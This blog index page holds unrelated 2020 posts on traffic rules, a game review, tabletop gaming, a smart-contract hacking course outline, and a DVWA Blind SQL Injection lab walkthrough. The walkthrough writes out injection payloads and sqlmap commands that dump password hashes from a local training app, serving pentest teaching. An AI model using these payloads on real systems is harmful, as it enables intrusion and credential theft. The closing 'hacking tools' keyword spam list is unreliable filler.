Tuesday, 22 September 2020

Know These Traffic Rules And Challan Rules In India

 Indian Traffic Rules And Challan Rules



Hi friends kindly know These Traffic Rules And Challan Rules In India and you can reduce the risk for fine.

Click Here For Full Details Of Traffic Rules And Challan Rules In India


Credits - Shivanshu Sharma And Sudhanshu Sharma

Posted by at No comments:

Monday, 21 September 2020

Heroes Of Hammerwatch - Ultimate Edition Review (NSW)

Written by Patrick Orquia


Title: Heroes of Hammerwatch - Ultimate Edition
Developer: Crackshell
Publisher: Blitworks
Genre: Action Adventure, RPG, Roguelite
Number of Players: 1
Platform: Nintendo Switch
Release Date: July 29, 2020
Price: $19.99


I like roguelike/roguelite games, even though they incite violent rage in me when I play them. Ok, no, not violent. I just cuss a lot and maybe scream loud enough for the people next door to call the cops on me. As frustrating as these games could be, there is one thing that is for sure: they are very fun to play, because they make me continuously get better at the game by learning from my past mistakes bit by bit and force me to try new strategies to keep me from dying over and over again.




Heroes of Hammerwatch is a roguelite RPG game, wherein you play as a warrior who has to explore dungeons to accumulate money and ores to rebuild the town of Outlook. As expected with roguelite games, you will die a lot of times in the process. This game is very punishing early on and the gameplay gets very repetitive very fast, but if you have the tendency to get addicted to the risk-reward cycle of games such as this, you could end up spending hours upon hours trying to level up and earn money and other rewards.

At the start of the game, you get to choose which warrior class you want your character to be and customize its looks to your liking. The game has 16-bit aesthetics, and your character and the rest of the visuals will look pixelated, but still, you get to create it and see how the game will show it in all of its pixel-y goodness. You can create multiple characters in a single save file, and they all share resources. This is a good game mechanic because it offers you multiple ways to tackle the challengers of the game, since different classes have different attack styles and skills. Plus you don't want to get stuck with just a paladin character. Maybe you would want a ranger or a wizard, too, depending on your mood.

The game is presented as a dungeon crawler, where your character has to battle hordes of enemies that will try to kill you in large numbers at first sight in large, procedurally-generated dungeons sectioned into rooms and corridors. There are two types of attacks, one is a normal attack, either melee or ranged, and the other is skill, which uses mana points (MP). Additional skills get unlocked as you progress. You get experience points upon defeating these enemies. If you defeat enough enemies in quick succession without getting hit, you will enter a combo state that makes your character move faster and hit harder, and you could also generate HP and MP. Some of the rooms contain loot such as gold, food, and the elusive ores. These ores are used to unlock new establishments that would provide permanent skill upgrades, temporary buffs, and other goodies.




At the beginning of the game, you start with the first dungeon, the mines. It is divided into four floors, with the last one containing a boss that you need to defeat to proceed to the next one. The bosses can be quite hard to beat, as they have a large HP plus waves of enemies also join fray, so you have to keep on moving and keep on killing, or risk getting killed yourself. The other dungeons are presented the same way. If or when you die, you end up back to the town, with all of your temporary abilities and unsaved gold/ores gone. This kind of stings, but typical for a roguelite game. But wait, you ask, unsaved gold/ores? Well, in this game, you are required to send to town the money you collect from the dungeons. Some floors will have an elevator that goes back to town where you can put the gold and ores you have collected so far. This will be your savings, minus some taxes. The game does not specifically explain this, and I personally wasted a few runs earning nothing because I didn't know that I had to do this. Not all floors have this, so the further you go without saving your money, the greater the risk that you have, plus the louder you scream when you die.

By the way, this game implements a cool way of skipping floors to advance to dungeons that you have already visited: at the starting floor of the preceding dungeon, you can find a portal that leads to a challenge room. Where you have to survive many waves of enemies in order to advance to the succeeding dungeon. The goal is to break a cube at the center of the room and as long as it is intact, the waves of enemies don't stop. Surviving this room will reward you with 8 FREE temporary buffs that you can use for the rest of your run (they disappear when you die). Typically, buffs can be bought at a shop in the town or found in treasure chests and NPCs inside the dungeons. These buffs add up and work alongside one another, so the more buffs you have equipped, the more fighting chance your character gets in surviving the dungeons.




The more you progress into the game, and hopefully you get more and more skilled in killing enemies and saving those precious coins and ores, the more you can build up the town. Town upgrades require a certain amount of ores, so yes, you will really spend hours upon hours grinding in the dungeons to upgrade them. But if you do manage to upgrade the establishments, you will reap the benefits, because you can then have more options to upgrade your character… for it to be more capable of killing more enemies and collecting loot and goodies. Rinse and repeat.

To somehow break the monotony of repetitive gameplay, you can try playing with other people, either local or online. The local multiplayer is fun and makes traversing dungeons easier, since you get to share the load of killing the multitude of enemies, plus you get to share a high five with your friends every so often, or maybe yell at them if they die more than you do. The online multiplayer is a bit of a mixed bag, as trying to find parties to join or people to join your own party can be a bit hard. Maybe the game is not being played as much by other people on the Switch, which is quite a shame. This version of the game also comes with all the DLCs that have been available for the game so far (it has been out and available to other platforms for a couple of years now). The new areas still play basically the same, but with tougher challenges, which will really test your skills. Oh, and the game also has a New Game+, so really, your grinding and killing spree will not stop if you so choose.




Overall, Heroes of Hammerwatch – Ultimate Edition is a good game that has a lot to offer. It has cool visuals and aesthetics, with an equally cool soundtrack to wrap everything together. It has a steep learning curve, but once you get the hang of the gameplay, you'll soon find yourself being a very capable warrior that can go toe to toe against the toughest of enemies. So if you are aching for a good roguelite game, give this game a go and put your dungeon exploration skills to the test.



REPLAY VALUE: Very high



PROS

  • Cool visuals with 16-bit aesthetics
  • Catchy soundtrack to keep you moving as you explore the dungeons
  • Wide range of customization options to suit your play style
  • High degree of enemy types
  • Repetitive yet very addicting and enjoyable gameplay
  • Very challenging, with a steep learning curve at the beginning, but very rewarding as you progress further into the game
  • Has a surprisingly good amount of content
  • Has local and online multiplayer options


CONS

  • Characters look very tiny, especially in handheld mode
  • Looks very dark in handheld mode, which make it even harder to differentiate enemies and traps
  • Very grind-heavy
  • Some dungeon floors don't have the elevator for saving gold and ores, and thus result to high frustration when you die because you lose everything unsaved
  • Frame rate drops are encountered when there is too much action happening on screen
  • Can be hard to find online parties to join or players to join your own party


RATING: 4/5 Hammerwatch heroes and villains
Posted by at No comments:

Saturday, 12 September 2020

And I'm Still Losing...

What's going on everyone!?


Today for the #2019gameaday challenge my lovely wife, beautiful daughter and I played a game of Hero Realms with the Wizard, Thief and Ranger expansions. 


Unfortunately, I still cant post pictures unless they're screenshots because there is an error with the blogger app but rest assured I really did lose, lol!


Trinity ended up killing me and doing a great job as usual but this time Sam ended up finishing her off before she could regain any health and take her mother out as well.


As always, thank you for reading and don't forget to stop and smell the meeples! :)

-Tim

Posted by at No comments:

28Mm Crusades Command Bases



A quick show off post today of some new command bases for my 28mm Crusades Project. These figures are from 1st Corps / Curtneys Miniatures and I picked them up from the York show a couple of years back.


I am always really slack when it comes to Command Stands and end up with armies hundreds of figures strong with no commanders, so to get four (The other one will be in the Kingdom of Jerusalem force review later in the week) done at this stage of the Army build is pretty remarkable.



Base number one is based on my Red Knights unit (a later Hospitaller unit) and consists of a musician and standard bearer, flags are from Flags of War.



Second base is for my St Lazarus Knights, those of you who are familiar with the blog may notice that my choice of command stands is based around left over decals from previous units, not that I'm tight or anything 😁

The commander figures are basically the same but with different head and weapon options, this one has a bishop type head and a made.



So there we have three command bases ready for our next Crusades game whenever that will be, Kingdom of Jerusalem and of Project shots coming next.


Posted by at No comments:

Thursday, 3 September 2020

Inspiration Strikes - Handling Poison

Ch-click! The stone surface depressed slightly underneath the halfling's foot. Just as that fact made itself known to the footpad's mind, a row of small needles sprang from the floor, piercing the boot and puncturing Lightfinger's foot! 

"OWWWW!" he cried as he backed up. "Something got me!"

Then... he felt a wave of nausea sweep over him. Bile rose in his throat as his limbs felt weak.

"Guys... I don't feel so good..."


Poison is one of those topics that every DM has thought about. Sean over at TheCampaign20xx blog has a great summary of D&D's published poison rules across the editions.

I'm a fan of things giving players pause. I remember the look on my player's face when he had to save vs. Death because of poison from a Chaos creature - this was a 4th level paladin! There had been plenty of foreshadowing about these creatures, but the frisson of the moment was palpable to all eight of us at the table! (He used the d30 rule [1] and survived.)

We play to live, knowing that we can die... but dying from the poison of a 10 year old trap or a Giant Centepede? There are times when I want something different.

Thus, when Lightfingers hit a trap during a recent delve into the infamous Quasqueton dungeon, and failed his save, I thought about what the result should be. Death, and lots of laughter and a quick six 3d6 generation? Or do something more fun, giving this character a different fate?

I opted for the latter. RAW OD&D (as per the original 3 books) has an interesting bit regarding Constitution (pg 11) - "Constitution 13 or 14: Will withstand adversity. Constitution 9 - 12: 60% to 90% chance of surviving. Constitution 8 or 7: 40% to 50% chance of survival"

Oho! This poison trap gave me a chance to use that bit. I rolled to see when the poison's effect would require him to test his "chance of survival" (. i.e., a system shock!) and it was 6 turns. During that time, his move dropped to 3", he was at -4 for melee/missiles/saves.

At 6 turns, he failed his "chance of survival" check and he took a d6 of damage from the poison.. Another d6 said he had to check again in 4 turns. He was still at his "poisoned" penalties. After those 4 turns, he rolled his check. He was no longer sick, but the hp loss remained, subject to any healing that might be found in the dungeon.

For my game, this was more fun and generated quite a bit more caution out of the PCs. They had the chance of somehow finding something to help Lightfingers, or hope that he recovered, or wondered if he would die. I wanted that kind of game better more than "BLAM, you're dead, reroll". (those games are absolutely appropriate and great fun!)

From that bit of in-game inspiration, I came up with this sort of approach for future use:

Alternative Poison Rule

For poisons of creatures of less than 2HD, for many contact poisons and some (weak) ingested poisons, make a save vs. poison. If they fail:

  1. Victim is penalized -4 on melee/missile to-hits and other saving throws.
  2. A d6 determines how many turns elapse before the PC must make a "Constitution survival (system shock) check". (OD&D: CON of 6 or less, AD&D: Con of 5 or less: 0% chance).  If the PC has a 13+ con (OD&D), or 15+ con (AD&D), the effects wear off after this initial period of illness with no hp loss or further penalty.
  3. A failed survival check means the poison does d6(OD&D) or one half of  2 to 4d10(AD&D, DMG pg 20 lays out the different classes of poison) hp damage. Another d6 is thrown to see how many turns elapse before the next check.
  4. A successful check means that the victim is able to withstand the effects of the poison and no longer suffers from the penalties or damaging effects. Any lingering effects is up to the DM!
  5. Poison hp loss may be cured at anytime, even while the victim is sick, but said curing does not remove the effects of poison! Only antitoxin/antivenom, or some magical means that removes poison, will heal the victim of the poison's effects.

For creatures of 2+HD or virulent/strong poisons, the "save or die" rule applies, unless other effects are noted for the poison.

For me, this is a nice little subsystem that uses Constitution and hp in ways that make sense to me. It is possible that one may indeed die from poison, but at least there is a 1 to 6 turn time period which they desperately search for a means of survival. It might not necessarily be "simple", but it's something I could play now and again, for a bit of variety to how poisons work.

Game on!

[1] The d30 Rule:  If, in the perilous moment of fate and before the hand of the GM hath cast the selected dice, thou wishest to chance thy fate on the great black and red d30, thou mayest do so. Thee must declare thine wishes prior to the cast of fates. Once the d30 hast been cast, thou must live with thine fate as decreed. Only once per game may thou chooseth the d30. Thou are prevented from using the d30 to determine thy starting or additional hit points.
Posted by at No comments:

Sunday, 30 August 2020

Blockchain Decentralized Application Hacking Course - A Journey Into Smart Contract Hacking And DApp Penetration Testing (Web 3.0)


Smart Contract Exploitation and Hacking Course Announcement


What Is this: 

For those who have been hitting me up on twitter and YouTube for more blockchain smart contract exploitation content this blog is for you. I have posted a video below explaining what this is and included a course outline of the content we are providing free for everyone. I was actually told recently that I am crazy for giving out this level of detailed content and training for free.. However, I believe in the original hacker ethic code from long ago, that information should be freely available for everyone!! In this frame of mind, the only pay for content will be if you wish to go the extra mile. For the person who wants to prove to themselves or others that they learned something via a certification package with detailed exam prep targets and guides, followed by a final exam CTF and reporting write-up. 

So I hope you enjoy this content. The content and walk through labs will be all free. This content will be posted regularly over the next few months 90% of it is already written and ready to go.

We will start off with the differences between Solidity and other languages and do a quick coding overview before we start hacking. This way everyone is on the same page when we start looking at coding examples of vulnerable targets or reviewing case study code. Then we will cover a wide range of typical issues that effect decentralized applications(DApps) and smart contracts on the Ethereum blockchain. How to spot them and exploit them with full walk-through style learning. Subjects we have already released (Re-Entrancy, Integer Attacks, Authorization) have been updated with new code, new examples, and case studies etc. Some of the learning content will be the same but with a lot of newly added content.  And in the case of Authorization completely re-written and expanded on. 

Basically this course was created to get the information out there in a clear concise way. Because when I started researching blockchain hacking all I found was a paragraph here and there on something that was overly technical or completely theoretical. I couldn't find any clear concise learning or examples. This drove me nuts trying to figure everything out, until I gave up and just coded my own vulnerabilities and hacked them. So hopefully this fills the knowledge gap to offer a clear and concise, Zero Fluff resource to those on the same path. 


CTF Exam: 

If you do enjoy this series over the next few months and want to challenge your skills and certify that you learned something we will be also offering pay for certification bundle that includes Decentralized Application (DApp) targets and detailed lab guides as preparation for a final exam against a more comprehensive CTF certification challenge target. More info on this as the months progress. 


Bug Bounty of Sorts: 

These labs are completed but we are working on a way to deliver the content which requires me to code up a course delivery software. So feel free to hack the course delivery software once its up, if you break in or bypass authorizations I will give you the full course for free provided you help me fix it. :P 


Pre- Requisites: 

This is more of a intermediate / advanced course with a white box code approach to bug hunting and a dynamic approach to application hacking and exploiting targets, with that said you will need the following pre-requisites: 

  • Ability to code in some language and understanding of coding concepts. 
  • Application hacking or development background with firm understanding of vulnerabilities


Contact Info:

As this is free, I only ask that you provide constructive feedback as we are creating other more advanced hacking courses on random subjects we are interested in. Most of which will be free.  And feedback helps us not do things which are not useful and integrate new ideas where they make sense.

Cheers and I hope this finds you well.

Twitter: 

Email: 

  • info@cclabs.io

WebPage:  


Intro Video: 



Course Outline / Release Order: 

Orange = = Whats included additionally for the full course

Blue = = What will be released free in blogs / videos 

(Mostly every Mondays) over the next few months


Building and Scoping Things

    Chapter 1: Cliff Notes on Blockchain

        Intro:

        What is a Blockchain and how is it secured

        Smart Contracts

        What is a Decentralized Application (DApp)?

        Diving into Blockchain Components:

        Distributed Vs Decentralized

        Provenance Use Case:

        Consensus and Mining:

            Hands on Lab - Blockchain Consensus walkthrough Lab

        Summary:

        References:


    Chapter 2: Threat Modeling and Scoping Engagements

        Architecture Considerations:

        Business Logic Locations and Technology Decisions

        Development Environments

        Threat Modeling

        Summary

        References:


    Chapter 3 – Solidity for Penetration Testers Part 1 (Hello World)

        About Solidity

            Hands on Lab - Remix interface overview

        Structure of a Smart Contract

            Hands on Lab – HelloWorld

        Summary

        References:


    Chapter 4 – Solidity for Penetration Testers Part 2

        Beyond Hello World

            Hands on Lab – Code HelloWorld bank

        Code Level Walk Through of HelloWorld Bank

        Checks Effects Interactions:

        Summary


Part 2: Hacking and Exploiting Things

    Chapter 5 - Glass Half Full or Glass Half Empty: Integer Attacks

        Underflows and Overflows

        Withdraw Function Vulnerable to an underflow

        Transfer Function Vulnerable to a Batch Overflow

        Batch Overflow Code Explanation:

            ERC20 Batch Overflow Case-Study

            Walkthrough of The Vulnerable Function

            Reviewing the Real Attack Transaction

            Hands on Lab - Exploiting Our Own ERC20 Batch Overflow

            Hands on Lab - Fixing the ERC20 Overflow

            Exam Prep - DApp Target + Detailed Lab Guide

            Hands on Lab -Safe Math Walk Through

        Integer Attacks Summary

        Integer Attacks References

          

    Chapter 6 - You Again: Leveraging Reentrancy Attacks

        Reentrancy Intro

        Checks Effects Interactions Pattern

        Simple Reentrancy Example Code

        Passing the Checks:

        Looping the Interaction:

        Updating the Effects:

        Attacking Code Example:

            Hands on Lab - Attacking a Simple Reentrancy

            Hands on Lab - Fixing the Checks Effects interaction Pattern

        Send vs Transfer Vs Call.Value

            Case Study – The Dao Hack

            Exam Prep - DApp Target + Detailed Lab Guide

        Reentrancy Summary

        Reentrancy References


    Chapter 7 Do You Have a Hall Pass: Access Control Attacks

        Understanding Smart Contract Authorization and Visibility

        Visibility:

        Simple Visibility Example:

        Implementing Authorization:

        Example Walk-through of No Authorization

        Thinking about Smart Contracts as unpublished API's for DApps

            Case of the Video Game Heist

        Enumerating functions in a contract

            Hands on Lab - Directly Calling Public Functions with Web3

            Hands on Lab - Example Fix with Simple Authorization

        Exit Scam Warning

            Hands on Lab - Example Fix-2 Using Modifiers for Simple Authentication

            Hands on Lab - Example Using Openzeppelin for Role Based Access Control

            Exam Prep - DApp Target + Detailed Lab Guide

        Authorization Summary:

        Authorization References


    Chapter 8 - Dude Where's My Data: Storage Vs Memory Attacks

       Intro - Not Written Yet – Up Next

       Code Example -  Not Written Yet – Up Next

       Case study? - Not Written Yet – Up Next

       Exploiting vulnerability -  Not Written Yet – Up Next

       Summary -  Not Written Yet – Up Next

       References -  Not Written Yet – Up Next


    Chapter 9 - Do I know you:  TxOrigin vs Message.sender Attacks

        What's the difference?

        Man In the Middle Via tx.origin

            Hands on Lab -  Simple tx.origin Example Walkthrough

            Hands on Lab -  Vulnerable TX.Origin Example Walkthrough

            Exam Prep - DApp Target + Detailed Lab Guide

        Action steps to familiarize yourself with the contract:

        Attack Options:

        Summary

        References


    Chapter 10 - Who Am I: Delegate Call Attacks

        How delegate calls work:

        Delegate Call vs Call

        Simple Delegate Call Example Code

        Simple Delegate Code Example Walkthrough

            Hands on Lab - Simple Delegate Example Walkthrough

        Variable Memory Issues with Delegate Calls

        DelegateCall Storage Simple Example Code

            Hands on Lab - DelegateCall Storage Walkthrough

            Exam Prep - DApp Target + Detailed Lab Guide

        Case Study - Parity Wallet Attack:

        Attack Transactions Explained

        Dangerous fallback function using delegatecall

        The Parity Wallet Code

        Delegate Chapter Summary

        Delegate References:


    Chapter 11 - Look into My Crystal Ball: Bad Randomness Issues

        Cryptographic Implementations and Predictable PRNGs

        Simple BlockHash Example

            Hands on Lab - BlockHash Vulnerability Walk and Talk

            Exam Prep - DApp Target + Detailed Lab Guide

        Preventing Randomness Issues

        Bad Randomness Summary

        Bad Randomness References


    Chapter 12 - Automated Static Application Security Testing

        Content - Not written - Up Next 

            Hands On Lab - Not written - Up Next 

        Summary Not written - Up Next 

        References - Not written - Up Next 


Chapter 13 - CTF Exam

        Final Exam and CTF Certification Exam Target 

        Final Exam Reporting


Appendices

    Appendix I – Pre-Requisite Suggestions:

        Programming Pre-Requisites:

        Web Application Hacking Pre-Requisites:

    Appendix II – Other Blockchain Learning Resources and Certifications

    Appendix III – Non-Exhaustive Scoping Questions

    Appendix IV – Non-Exhaustive List of things to check for



Related links

Posted by at No comments:

Learning Web Pentesting With DVWA Part 3: Blind SQL Injection

In this article we are going to do the SQL Injection (Blind) challenge of DVWA.
OWASP describes Blind SQL Injection as:
"Blind SQL (Structured Query Language) injection is a type of attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query's syntax is incorrect. Blind SQL injection is nearly identical to normal , the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible."
To follow along click on the SQL Injection (Blind) navigation link. You will be presented with a page like this:
Lets first try to enter a valid User ID to see what the response looks like. Enter 1 in the User ID field and click submit. The result should look like this:
Lets call this response as valid response for the ease of reference in the rest of the article. Now lets try to enter an invalid ID to see what the response for that would be. Enter something like 1337 the response would be like this:

We will call this invalid response. Since we know both the valid and invalid response, lets try to attack the app now. We will again start with a single quote (') and see the response. The response we got back is the one which we saw when we entered the wrong User ID. This indicates that our query is either invalid or incomplete. Lets try to add an or statement to our query like this:
' or 1=1-- -
This returns a valid response. Which means our query is complete and executes without errors. Lets try to figure out the size of the query output columns like we did with the sql injection before in Learning Web Pentesting With DVWA Part 2: SQL Injection.
Enter the following in the User ID field:
' or 1=1 order by 1-- -
Again we get a valid response lets increase the number to 2.
' or 1=1 order by 2-- -
We get a valid response again lets go for 3.
' or 1=1 order by 3-- -
We get an invalid response so that confirms the size of query columns (number of columns queried by the server SQL statement) is 2.
Lets try to get some data using the blind sql injection, starting by trying to figure out the version of dbms used by the server like this:
1' and substring(version(), 1,1) = 1-- -
Since we don't see any output we have to extract data character by character. Here we are trying to guess the first character of the string returned by version() function which in my case is 1. You'll notice the output returns a valid response when we enter the query above in the input field.
Lets examine the query a bit to further understand what we are trying to accomplish. We know 1 is the valid user id and it returns a valid response, we append it to the query. Following 1, we use a single quote to end the check string. After the single quote we start to build our own query with the and conditional statement which states that the answer is true if and only if both conditions are true. Since the user id 1 exists we know the first condition of the statement is true. In the second condition, we extract first character from the version() function using the substring() function and compare it with the value of 1 and then comment out the rest of server query. Since first condition is true, if the second condition is true as well we will get a valid response back otherwise we will get an invalid response. Since my the version of mariadb installed by the docker container starts with a 1 we will get a valid response. Lets see if we will get an invalid response if we compare the first character of the string returned by the version() function to 2 like this:
1' and substring(version(),1,1) = 2-- -
And we get the invalid response. To determine the second character of the string returned by the version() function, we will write our query like this:
1' and substring(version(),2,2) = 1-- -
We get invalid response. Changing 1 to 2 then 3 and so on we get invalid response back, then we try 0 and we get a valid response back indicating the second character in the string returned by the version() function is 0. Thus we have got so for 10 as the first two characters of the database version. We can try to get the third and fourth characters of the string but as you can guess it will be time consuming. So its time to automate the boring stuff. We can automate this process in two ways. One is to use our awesome programming skills to write a program that will automate this whole thing. Another way is not to reinvent the wheel and try sqlmap. I am going to show you how to use sqlmap but you can try the first method as well, as an exercise.
Lets use sqlmap to get data from the database. Enter 1 in the User ID field and click submit.
Then copy the URL from the URL bar which should look something like this
http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit
Now open a terminal and type this command:
sqlmap --version
this will print the version of your sqlmap installation otherwise it will give an error indicating the package is not installed on your computer. If its not installed then go ahead and install it.
Now type the following command to get the names of the databases:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id
Here replace the PHPSESSID with your session id which you can get by right clicking on the page and then clicking inspect in your browser (Firefox here). Then click on storage tab and expand cookie to get your PHPSESSID. Also your port for dvwa web app can be different so replace the URL with yours.
The command above uses -u to specify the url to be attacked, --cookie flag specifies the user authentication cookies, and -p is used to specify the parameter of the URL that we are going to attack.
We will now dump the tables of dvwa database using sqlmap like this:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa --tables
After getting the list of tables its time to dump the columns of users table like this:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users --columns
And at last we will dump the passwords column of the users table like this:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id -D dvwa -T users -C password --dump
Now you can see the password hashes.
As you can see automating this blind sqli using sqlmap made it simple. It would have taken us a lot of time to do this stuff manually. That's why in pentests both manual and automated testing is necessary. But its not a good idea to rely on just one of the two rather we should leverage power of both testing types to both understand and exploit the vulnerability.
By the way we could have used something like this to dump all databases and tables using this sqlmap command:
sqlmap -u "http://localhost:9000/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=aks68qncbmtnd59q3ue7bmam30" -p id --dump-all
But obviously it is time and resource consuming so we only extracted what was interested to us rather than dumping all the stuff.
Also we could have used sqlmap in the simple sql injection that we did in the previous article. As an exercise redo the SQL Injection challenge using sqlmap.

References:

1. Blind SQL Injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
2. sqlmap: http://sqlmap.org/
3. MySQL SUBSTRING() Function: https://www.w3schools.com/sql/func_mysql_substring.asp

Read more


  1. How To Hack
  2. Pentest Tools Download
  3. Pentest Tools For Android
  4. Hacker Tools For Windows
  5. Hacker Security Tools
  6. Hacker Hardware Tools
  7. Pentest Tools Linux
  8. Pentest Recon Tools
  9. Easy Hack Tools
  10. World No 1 Hacker Software
  11. Hacking Tools For Windows 7
  12. Hack Tools Download
  13. Hacker Tools Online
  14. Pentest Tools Url Fuzzer
  15. Game Hacking
  16. Pentest Tools Free
  17. Best Pentesting Tools 2018
  18. How To Install Pentest Tools In Ubuntu
  19. Pentest Tools For Windows
  20. Hacker Tools For Ios
  21. Hack Tools
  22. Growth Hacker Tools
  23. Pentest Tools Website Vulnerability
  24. Github Hacking Tools
  25. Hackrf Tools
  26. How To Hack
  27. Best Hacking Tools 2020
  28. Pentest Tools Bluekeep
  29. Hacker Tools Mac
  30. Pentest Box Tools Download
  31. Kik Hack Tools
  32. Pentest Tools Url Fuzzer
  33. Hacking Tools Pc
  34. Hack Apps
  35. Hacking Tools For Kali Linux
  36. Underground Hacker Sites
  37. Hacking Tools For Games
  38. What Are Hacking Tools
  39. Best Hacking Tools 2019
  40. Hacker Tools 2019
  41. Pentest Tools Tcp Port Scanner
  42. Pentest Tools Nmap
  43. Pentest Tools Bluekeep
  44. Ethical Hacker Tools
  45. Best Pentesting Tools 2018
  46. Hacker Tool Kit
  47. Hacking Tools Software
  48. Hack Tools For Ubuntu
  49. Top Pentest Tools
  50. Hacker Tools 2020
  51. Hacker Tools
  52. Hak5 Tools
  53. Black Hat Hacker Tools
  54. Game Hacking
  55. Hack Tools For Pc
  56. Pentest Tools Url Fuzzer
  57. Pentest Tools Open Source
  58. Growth Hacker Tools
  59. Hacking Tools For Games
  60. Best Pentesting Tools 2018
  61. Pentest Tools Subdomain
  62. Hacking Tools Name
  63. Hacking Tools For Mac
  64. Hacker Tools For Pc
  65. Pentest Tools Bluekeep
  66. Hack Tools For Pc
  67. Hacking App
  68. Pentest Tools Framework
  69. Pentest Tools For Mac
  70. Hacking Tools Pc
  71. Hack Tools For Games
  72. Hacking Apps
  73. Pentest Tools For Android
  74. Hackrf Tools
  75. Best Hacking Tools 2020
  76. Best Hacking Tools 2020
  77. Pentest Tools Framework
  78. Hacker Tools 2019
  79. Pentest Tools
  80. Hacker Tools Linux
  81. Pentest Tools Windows
  82. Hacker Tools Windows
  83. Hacking Tools Windows
  84. Hacking Tools Windows
  85. Termux Hacking Tools 2019
  86. Hacker Tools Free
  87. Underground Hacker Sites
  88. Hacker Hardware Tools
  89. Hacker
  90. Wifi Hacker Tools For Windows
  91. Hacking Tools For Windows 7
  92. Hack Tools 2019
  93. Hacker Tools Free
Posted by at No comments:
Subscribe to: Posts (Atom)